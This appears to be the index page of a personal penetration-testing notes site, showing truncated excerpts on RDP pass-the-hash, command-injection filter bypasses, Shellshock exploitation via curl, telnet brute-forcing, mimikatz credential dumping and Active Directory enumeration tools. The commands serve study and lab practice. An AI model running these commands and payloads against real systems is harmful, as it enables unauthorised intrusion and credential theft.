Use rdesktop for a normal login rdesktop $target Normal login for a local user xfreerdp /cert-ignore /u:user /p:pass /v:$target Login for a domain user xfreerdp /cert-ignore /u:user /d:dom.com /p:pass /v:$target To log in with an NTLM hash, use xfreerdp. xfreerdp /u:Peter /pth:666fb5b812a486f87062670c3baf1852 /v:$target Activate net localgroup "Remote Desktop Users" Administrator /add Create a new admin and enable…
Shellter can add a reverse shell payload into an exe file.
Configuration options env_reset: Resets the environment to the default configured in /etc/environment. env_keep: Adds environment variables which are additionally allowed. If LD_PRELOAD is in there, see below. mail_badpass: Sends an email to the admin if a user failed to provide a sudo password. secure_path: Sets the PATH environment variable to the given paths. Configurations Something like the following…
This post contains a collection of variable substitution commands. Bash $(echo id) Ruby #{} PHP {}
See also the encoding post for encoding methods. Tips Bypassing filters Linux / PHP All URL encoded values starting with a space character. | id %20%7c%20%69%64 || id %20%7c%7c%20%69%64 & id %20%26%20%69%64 && id %20%26%26%20%69%64 <?php print "1"" ?> %20%3c%3f%70%68%70%20%70%72%69%6e%74%20%22%31%22%22%20%3f%3e ;id %20%3b%69%64 Sources
Show shares with smbclient: smbclient --no-pass -L //$target smbclient -U guest //$target/ smbclient -U Administrator --pw-nt-hash $NTLMHASH \\\\$target\\directory Show shares with other clients: smbmap -R -H $target // No user smbmap -u L4mpje -p 'bureaulampje' -d WORKGROUP -H $target -R // User nmap -sV --script=smb-enum-shares -p445 $target crackmapexec smb $target -u '' -p '' --shares Vulnerability scan nmap --script=smb-vul* -p445 $target…
Enumeration Mandatory Optional Tools
Java Remote Method Invocation is a method to execute code remotely on other systems. This Oracle document describes it. But to use it, a program has to be uploaded first or it has to be known how to communicate with it. General A Java registry daemon has to be running. Run rmiregistry (bundled with Java) from…
Older bash versions may execute code after function definitions. Via command line Source with explanation export newfunction='() { echo 'shellshockdemo';}; echo vulnerable' Via a web server / CGI script Caution: Try the reverse shell example in Burp also if the curl command fails! curl http://$target/cgi-bin/admin.cgi -s > before curl -H "User-Agent: () { :; }; /bin/bash…
Shellshock A function in an environment variable is executed in a child process of bash. When exporting a new function like this export func='() { echo mist; }; echo aha;' and starting a new bash session, "echo aha" is executed.
NTLM info nmap -p 23 --script telnet-ntlm-info $target Brute-force nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=passwords.txt,telnet-brute.timeout=5s $target hydra -P passwords.txt -L users.txt $target telnet -V hydra -C users_and_passwords.txt $target telnet -V
Local file inclusion and Wrappers General: If you try to read PHP and nothing returns — use a base64 return! Remote file inclusion PHP deserialization If a program accepts a serialized object which uses a magic method, then… TODO, see here
Log on to another system with an NTLM hash Scenario: Then, use mimikatz to inject another user's NTLM hash into the secret storage: Steal another user's session Scenario: Then, with the use of mimikatz: privilege::debug sekurlsa::tickets /export This exports available tickets into the working directory (suffix .kirbi). Then, choose one file/ticket from the correct user and service. For…
Windows creates and stores credentials in the Local Security Authority Subsystem Service (LSASS) in memory. On the filesystem, the SAM database stores the hashes. Use Mimikatz Usage Enable debug mode. This uses the SeDebugPrivilege so that we are able to communicate with other processes. privilege::debug Try to elevate privileges to obtain SYSTEM user privileges:…
BloodHound analyzes and presents Active Directory data. SharpHound is the data collector which runs on a compromised AD system. On the target: On the own system:
Without shell access With shell access Choose one method to enumerate. 1. User and group enumeration with net (!) See what roles/privileges THIS USER has. Also locally. Maybe he/she already has administrative privileges. whoami /all List (and store!) the users of the domain net user /domain List (and store!) information like full names, group memberships, etc.…
Collection of privesc scripts. To start, upload PowerView.ps1 and: powershell -exec bypass PS> Import-Module .\PowerView.ps1 See the GitHub site for all commands. General enumeration powershell -exec bypass PS> . .\PowerUp.ps1 PS> Invoke-AllChecks Or: powershell.exe -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks" About users Enumerates all users. Get-NetUser Enumerate all users which do not require Kerberos preauth. Get-NetUser -PreauthNotRequired Returns…
Generic analysis tools Extract macros with oledump Use oledump.py to extract macros. List the file contents: python oledump.py $file Example from an output: ... 7: M 16267 'Macros/VBA/NewMacros' 8: m 932 'Macros/VBA/ThisDocument' ... To show details from a document part, use the first number and execute python oledump.py -s $no $file But to extract macros,…
Mainly post exploitation for AD environments. (Download — also included in Kali sources) Quick usage for privilege escalation General usage Metasploit syntax / PSE syntax Note: After usemodule don't forget to go "back" and to "interact" with the agent to see job results! Commands with an asterisk require a high-integrity Empire Agent. To upgrade one…
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';